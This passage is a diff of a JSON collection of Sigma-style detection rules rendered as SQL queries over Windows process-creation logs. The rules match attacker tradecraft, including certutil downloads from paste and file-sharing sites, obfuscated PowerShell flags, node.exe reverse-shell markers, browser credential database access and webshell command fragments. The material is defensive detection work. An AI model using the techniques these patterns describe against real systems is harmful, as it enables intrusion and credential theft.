/s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE 
'\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects Netsh command execution that whitelists a program 
located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. 
Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on 
the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": 
"Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine 
LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs 
WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": 
"proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE 
'\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network 
